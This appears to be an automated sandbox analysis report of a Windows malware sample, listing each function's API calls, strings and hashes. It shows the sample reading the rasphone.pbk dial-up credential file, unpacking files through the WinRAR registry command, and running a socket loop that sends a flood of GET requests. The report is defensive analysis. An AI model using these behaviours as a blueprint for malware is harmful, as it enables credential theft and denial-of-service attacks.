                        • Opcode ID: 86b2fbf9e77a3bdbd3f49c7996ce6159376f5595de912d1e34bcd1a945268350
                        • Instruction ID: 8861702fd6604c71056051f16bc259cc30c7169df780bacc6396a16b4c086892
                        • Opcode Fuzzy Hash: 86b2fbf9e77a3bdbd3f49c7996ce6159376f5595de912d1e34bcd1a945268350
                        • Instruction Fuzzy Hash: 1441E7B66443513EF3109764DC42FB737AAEB85784F100424F786AA2C1DAE16946866B
                        Function 100070D0 Relevance: 26.3, APIs: 11, Strings: 4, Instructions: 89stringCOMMON
                        Download Yara Rule
                        APIs
                        • GetWindowsDirectoryA.KERNEL32 ref: 100070EE
                        • strchr.MSVCRT ref: 10007100
                        • lstrcpy.KERNEL32(00000001), ref: 1000710B
                        • lstrcat.KERNEL32(?,?), ref: 10007120
                        • lstrcat.KERNEL32(?,\Application Data\Microsoft\Network\Connections\pbk\rasphone.pbk), ref: 1000712C
                        • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000023,00000000), ref: 1000713C
                        • wsprintfA.USER32 ref: 1000715C
                        • ??2@YAPAXI@Z.MSVCRT(00001000), ref: 1000717A
                        • GetPrivateProfileSectionNamesA.KERNEL32(00000000,00001000,00000400), ref: 100071A5
                        • lstrlen.KERNEL32(00000000), ref: 100071BD
                        • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 100071DB
                        Strings
                        • \Application Data\Microsoft\Network\Connections\pbk\rasphone.pbk, xrefs: 10007126
                        • Microsoft\Network\Connections\pbk\rasphone.pbk, xrefs: 10007149
                        • Documents and Settings\, xrefs: 100070F4
                        • %s//%s, xrefs: 10007156
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$??2@??3@DirectoryFolderNamesPathPrivateProfileSectionSpecialWindowslstrcpylstrlenstrchrwsprintf
                        • String ID: %s//%s$Documents and Settings\$Microsoft\Network\Connections\pbk\rasphone.pbk$\Application Data\Microsoft\Network\Connections\pbk\rasphone.pbk
                        • API String ID: 1834765725-145037316
                        • Opcode ID: ea2ca12f91690c0177fe22b59ab2b64000e33ec7f30e3f32dcd36f701b4e543f
                        • Instruction ID: 1d5da528494376ec11e15f2ceb721689f3966667e2731b8acf70afdf37f9cb04
                        • Opcode Fuzzy Hash: ea2ca12f91690c0177fe22b59ab2b64000e33ec7f30e3f32dcd36f701b4e543f
                        • Instruction Fuzzy Hash: B03190B1504395ABE310CF64DC88F9BB7E9FB89345F04091CF68997240E674EA09CBA2
                        Function 10007950 Relevance: 22.9, APIs: 15, Instructions: 369COMMON
                        Download Yara Rule
                        APIs
                        • ??2@YAPAXI@Z.MSVCRT(0000001C,00000000,?,00000000,00000000,?,100078E0,?,?,00000000,?,?,00000000,?,?), ref: 100079D0
                        • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000,00000000,?,100078E0,?,?,00000000,?,?,00000000,?,?), ref: 10007A13
                        • ??2@YAPAXI@Z.MSVCRT(?,00000000,?,00000000,00000000,?,100078E0,?,?,00000000,?,?,00000000,?,?), ref: 10007A27
                        • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000,00000000,?,100078E0,?,?,00000000,?,?,00000000,?,?), ref: 10007A6D
                        • ??2@YAPAXI@Z.MSVCRT(?,00000000,?,00000000,00000000,?,100078E0,?,?,00000000,?,?,00000000,?,?), ref: 10007A81
                        • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,00000000,?,100078E0,?,?,00000000,?,?,00000000,?,?), ref: 10007AC7
                        • ??2@YAPAXI@Z.MSVCRT(?,00000000,?,00000000,00000000,?,100078E0,?,?,00000000,?,?,00000000,?,?), ref: 10007ADB
                        • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,00000000,?,100078E0,?,?,00000000,?,?,00000000,?,?), ref: 10007B21
                        • ??2@YAPAXI@Z.MSVCRT(?,00000000,?,00000000,00000000,?,100078E0,?,?,00000000,?,?,00000000,?,?), ref: 10007B35
                        • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,00000000,?,100078E0,?,?,00000000,?,?,00000000,?,?), ref: 10007B7B
                        • ??2@YAPAXI@Z.MSVCRT(?,00000000,?,00000000,00000000,?,100078E0,?,?,00000000,?,?,00000000,?,?), ref: 10007B8F
                        • ??3@YAXPAX@Z.MSVCRT(?,?,?), ref: 10007BE8
                        • ??2@YAPAXI@Z.MSVCRT(?,?,?), ref: 10007BFC
                        • ??3@YAXPAX@Z.MSVCRT(00000000,?,?), ref: 10007C41
                        • ??2@YAPAXI@Z.MSVCRT(?,?,?), ref: 10007C55
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: ??2@$??3@
                        • String ID:
                        • API String ID: 1245774677-0
                        • Opcode ID: efc4adb11d259ce337aa2f88174ac1102378eaacc0aa5d6b11d5639599dfff2b
                        • Instruction ID: f5f466769b3d5a285a58fc263d702a5cbf1c20c9a80e860f9cf8c2d8843b1e01
                        • Opcode Fuzzy Hash: efc4adb11d259ce337aa2f88174ac1102378eaacc0aa5d6b11d5639599dfff2b
                        • Instruction Fuzzy Hash: FBC1BFB5B002054BA718CE39C88296B77D6FFC82A0B19862CF91A8B3C5DF75ED05C791
                        Function 10009470 Relevance: 22.8, APIs: 9, Strings: 4, Instructions: 93stringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 1000DA90: RegOpenKeyExA.KERNEL32(?,00000000,00000000,00020019,?,74DF23A0,?,?), ref: 1000DAFC
                        • lstrlen.KERNEL32(?), ref: 100094F5
                        • lstrcat.KERNEL32(?,rar.exe), ref: 10009531
                        • lstrcpy.KERNEL32(?,?), ref: 10009542
                        • PathRemoveFileSpecA.SHLWAPI(?), ref: 1000954C
                        • lstrcpy.KERNEL32(?,?), ref: 10009558
                        • PathRemoveExtensionA.SHLWAPI(?), ref: 1000955F
                        • lstrcat.KERNEL32(?,1007A0CC), ref: 1000956F
                        • wsprintfA.USER32 ref: 10009584
                        • ShellExecuteA.SHELL32(00000000,open,?,?,00000000,00000000), ref: 100095A8
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: PathRemovelstrcatlstrcpy$ExecuteExtensionFileOpenShellSpeclstrlenwsprintf
                        • String ID: WinRAR\shell\open\command$open$rar.exe$x %s %s
                        • API String ID: 1763624715-2921234164
                        • Opcode ID: 7f2e975523fe2e8bcc399525799bcc9cdfde6edcdcfa1cdec018838bf37f6480
                        • Instruction ID: 6f2a5d6d61e29fd9b32933393f3aebf121524222d07c899c0ac238576ae04a66
                        • Opcode Fuzzy Hash: 7f2e975523fe2e8bcc399525799bcc9cdfde6edcdcfa1cdec018838bf37f6480
                        • Instruction Fuzzy Hash: E931B5B6104395AFE730DB64CC94FEB77AEEBC8304F00891DF68597141DA746A09CB62
                        Function 1000C2C0 Relevance: 22.8, APIs: 15, Instructions: 287stringCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: strchrstrncpy$atoi
                        • String ID:
                        • API String ID: 3940265933-0
                        • Opcode ID: 816fdbf65cd72fabb2aa30a79c57e8cb6fd0b7eed96f753a9e6d43fb37b6bd28
                        • Instruction ID: 0fdf4c8053bc9ff82b36e248c3a16f8bfc8b4a51b13a3ddeb2220d11fe4376a8
                        • Opcode Fuzzy Hash: 816fdbf65cd72fabb2aa30a79c57e8cb6fd0b7eed96f753a9e6d43fb37b6bd28
                        • Instruction Fuzzy Hash: 6A91FB329001595BD728CB75CC45AEFB7A5FF88360F504369F91AA32C0DEB49F45CA94
                        Function 10002940 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 84windowregistryCOMMON
                        Download Yara Rule
                        APIs
                        • GetModuleHandleA.KERNEL32(00000000), ref: 10002947
                        • LoadIconA.USER32 ref: 1000297E
                        • LoadCursorA.USER32(00000000,00007F00), ref: 1000298F
                        • RegisterClassExA.USER32(?), ref: 100029AE
                        • CreateWindowExA.USER32(00000000,1007A204,1007A204,00CF0000,000000DF,000000DF,000000DF,000000DF,00000000,00000000,00000000,00000000), ref: 100029D4
                        • ShowWindow.USER32(00000000,00000005), ref: 100029E3
                        • UpdateWindow.USER32(00000000), ref: 100029EA
                        • GetMessageA.USER32(00000000,00000000,00000000,00000000), ref: 10002A01
                        • TranslateMessage.USER32(00007F05), ref: 10002A19
                        • DispatchMessageA.USER32(00007F05), ref: 10002A20
                        • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 10002A2D
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: Message$Window$Load$ClassCreateCursorDispatchHandleIconModuleRegisterShowTranslateUpdate
                        • String ID: 0
                        • API String ID: 2442869364-4108050209
                        • Opcode ID: a5df4cdca1b6303bb7a157d627bf0f17ec5658882591744a2746c0665ef1b709
                        • Instruction ID: 452a29b99672fa169a167d43a9007894026dbe05f92063e57662e3b8614e90c2
                        • Opcode Fuzzy Hash: a5df4cdca1b6303bb7a157d627bf0f17ec5658882591744a2746c0665ef1b709
                        • Instruction Fuzzy Hash: F921B7716083607FF310DB648C49F4B7BA4EB85B60F104619F744AB3C0EBB59A01CB96
                        Function 1000AAE0 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 62COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: wsprintf$Version
                        • String ID: Windows 2000$Windows 2003$Windows NT$Windows Windows7/Vista/2008$Windows XP
                        • API String ID: 514958720-574678973
                        • Opcode ID: bf58b4ad99adad6409f910661b6ee8fe034f4f40f1ecb92a7fdf0be722cf5670
                        • Instruction ID: 24c1d421adad4ae168f3c91883552d5e216c80a16ef910f6aa1ad10f15ce1383
                        • Opcode Fuzzy Hash: bf58b4ad99adad6409f910661b6ee8fe034f4f40f1ecb92a7fdf0be722cf5670
                        • Instruction Fuzzy Hash: 05118F30801796A7E610DB18DC85F8E77D1EB42295F40C515F7C9D2223D73C89858AAB
                        Function 10010010 Relevance: 19.6, APIs: 13, Instructions: 74COMMON
                        Download Yara Rule
                        APIs
                        • ReleaseDC.USER32(?,?), ref: 10010048
                        • DeleteDC.GDI32(?), ref: 10010058
                        • DeleteDC.GDI32(?), ref: 1001005E
                        • DeleteDC.GDI32(?), ref: 10010064
                        • DeleteDC.GDI32(?), ref: 1001006D
                        • DeleteObject.GDI32(?), ref: 10010079
                        • DeleteObject.GDI32(?), ref: 1001007F
                        • DeleteObject.GDI32(?), ref: 10010088
                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,1006A2DE,000000FF,1000FFF8), ref: 10010092
                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,1006A2DE,000000FF,1000FFF8), ref: 1001009E
                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,1006A2DE,000000FF,1000FFF8), ref: 100100A7
                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,1006A2DE,000000FF,1000FFF8), ref: 100100B0
                        • DestroyCursor.USER32(00000000), ref: 100100D6
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: Delete$??3@$Object$CursorDestroyRelease
                        • String ID:
                        • API String ID: 2735177900-0
                        • Opcode ID: 88d8ee02bde693fecdd167aef27db3de6e3e6adf181a70a9ef565598dacbdba7
                        • Instruction ID: 40855e795b9994a06c17d96a434293416e0ab878ab8001573340353b808a687e
                        • Opcode Fuzzy Hash: 88d8ee02bde693fecdd167aef27db3de6e3e6adf181a70a9ef565598dacbdba7
                        • Instruction Fuzzy Hash: 8E21E7B6600B509BD224DBA9CC80A57F3E9FF88710F154D1DE69A87650DAB9F8408BA1
                        Function 10009930 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 127filestringCOMMON
                        Download Yara Rule
                        APIs
                        • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 10009944
                          • Part of subcall function 100098B0: ??2@YAPAXI@Z.MSVCRT(00000400,?,74DF0F10,74DF2EE0,10002CFA,?,SSSSSS), ref: 100098B8
                          • Part of subcall function 100098B0: FindResourceA.KERNEL32(?,0000006C,HOST), ref: 100098D9
                          • Part of subcall function 100098B0: LoadResource.KERNEL32(?,00000000), ref: 100098E1
                          • Part of subcall function 100098B0: LockResource.KERNEL32(00000000), ref: 100098E8
                          • Part of subcall function 100098B0: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 10009914
                        • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000080,00000000), ref: 100099FB
                        • GetFileSize.KERNEL32(00000000,00000000), ref: 10009A0E
                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 10009A22
                        • lstrlen.KERNEL32(?), ref: 10009A30
                        • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 10009A39
                        • lstrlen.KERNEL32(?,?,00000000), ref: 10009A5F
                        • WriteFile.KERNEL32(00000000,00000000,00000000), ref: 10009A68
                        • CloseHandle.KERNEL32(00000000), ref: 10009A6F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$Resource$??2@lstrlen$??3@CloseCreateDirectoryFindHandleLoadLockPointerSizeSystemWrite
                        • String ID: .key$XXXXXX
                        • API String ID: 3558955628-2601115946
                        • Opcode ID: 414a28476207a3a5b972280860fe32485c0c9a40dd829a028d92af4c1fb2d687
                        • Instruction ID: 60457d991d027f43edb6e8b1e85ed4da5897b9db5320601ca10af0e33541605b
                        • Opcode Fuzzy Hash: 414a28476207a3a5b972280860fe32485c0c9a40dd829a028d92af4c1fb2d687
                        • Instruction Fuzzy Hash: 6D316B722006441BE728DA749C9AF6B368BEBC5371F14072DFB678B2D1DEE49D098361
                        Function 10004340 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networksleepthreadCOMMON
                        Download Yara Rule
                        APIs
                        • WSAStartup.WS2_32(00000202,?), ref: 10004354
                        • htons.WS2_32 ref: 1000437B
                        • inet_addr.WS2_32(1007DDAC), ref: 1000438B
                        • socket.WS2_32(00000002,00000001,00000000), ref: 100043AA
                        • connect.WS2_32(00000000,?,00000010), ref: 100043BA
                        • send.WS2_32(00000000,GET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET !@#$%.htmGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#,?,00000000), ref: 100043DF
                        • Sleep.KERNEL32(00000032,?,00000000), ref: 100043E8
                        • closesocket.WS2_32(00000000), ref: 100043F5
                        • RtlExitUserThread.NTDLL(00000000), ref: 10004406
                        • closesocket.WS2_32 ref: 1000440D
                        Strings
                        • GET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET !@#$%.htmGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#, xrefs: 100043C7, 100043D9
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: closesocket$ExitSleepStartupThreadUserconnecthtonsinet_addrsendsocket
                        • String ID: GET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET !@#$%.htmGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#
                        • API String ID: 4272391932-4039768343
                        • Opcode ID: 6be616c98efd641372f917d20bf551fd97e4ee60cf2278735f5bd3c030c7430b
                        • Instruction ID: f9848304cd2ba2fa41d176b923ecb0142be28a43c1fb6bf90fbd86cbaff65e0a
                        • Opcode Fuzzy Hash: 6be616c98efd641372f917d20bf551fd97e4ee60cf2278735f5bd3c030c7430b
                        • Instruction Fuzzy Hash: EC2107711013A06FF300DF308C89BAA37A9EF89754F10062DF5A2962D1EBB48D45876A
                        Function 0040156A Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 112COMMON
                        Download Yara Rule
                        APIs
                        • GetVersionExA.KERNEL32(?), ref: 004015B9
                        • GetWindowsDirectoryA.KERNEL32(00000000,00000104), ref: 004015F0
                        • wsprintfA.USER32 ref: 00401620
                        • GetFileAttributesA.KERNEL32(?), ref: 0040163A
                        • ExitProcess.KERNEL32 ref: 00401647
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4082612578.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.4082597077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082631431.0000000000406000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082647752.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082671358.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082688873.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082705565.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_ILQ18dgzMU.jbxd
                        Similarity
                        • API ID: AttributesDirectoryExitFileProcessVersionWindowswsprintf
                        • String ID: %s\SysTEM32\sysedit.exe$H$o$s$t
                        • API String ID: 2470598139-87740868
                        • Opcode ID: d2e811863a9b49c5d408ef776e4ffa2498d0a50ecc84f11167e5ab6d080ebfc2
                        • Instruction ID: 9c754c24d7df86e72f217f6b84ded3ef6561d36448fc88f2c9c81648c7896505
                        • Opcode Fuzzy Hash: d2e811863a9b49c5d408ef776e4ffa2498d0a50ecc84f11167e5ab6d080ebfc2
                        • Instruction Fuzzy Hash: 9F216332E04258AFDF61C7A4DC0DBCE7BB96B06304F1044E5E285B51D1DBB85B98CB1A
                        Function 10012CF0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 108networkCOMMON
                        Download Yara Rule
                        APIs
                        • InternetOpenA.WININET(Mozilla/4.0 (compatible),00000000,00000000,00000000,00000000), ref: 10012D16
                        • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,80000000,00000000), ref: 10012D44
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: InternetOpen
                        • String ID: MZ$Mozilla/4.0 (compatible)
                        • API String ID: 2038078732-1122958964
                        • Opcode ID: d10be42031837469b98f0b27fd1faf31f20e4ff0f895af1cd78f0af11c48c121
                        • Instruction ID: 50953ecb14d96b8ad73d1700d153ed96a2a3a5bf033426cc288570bde15a6930
                        • Opcode Fuzzy Hash: d10be42031837469b98f0b27fd1faf31f20e4ff0f895af1cd78f0af11c48c121
                        • Instruction Fuzzy Hash: 3C31F5B1104359ABD210DF21DC80E9FBBEDFBC97A4F42092DF54497240D735E94987A6
                        Function 10008120 Relevance: 16.6, APIs: 11, Instructions: 136stringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrlen.KERNEL32(?), ref: 10008151
                        • malloc.MSVCRT ref: 10008159
                        • lstrcpy.KERNEL32(00000000,?), ref: 10008171
                        • CharNextA.USER32(00000002,?,?,?,00000001), ref: 1000819D
                        • CharNextA.USER32(00000002,?,?,?,00000001), ref: 100081BB
                        • GetFileAttributesA.KERNEL32(00000000), ref: 100081FF
                        • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 1000820C
                        • GetLastError.KERNEL32(?,?,?,00000001), ref: 10008216
                        • CharNextA.USER32(00000000), ref: 10008234
                        • free.MSVCRT ref: 10008249
                        • free.MSVCRT ref: 10008274
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
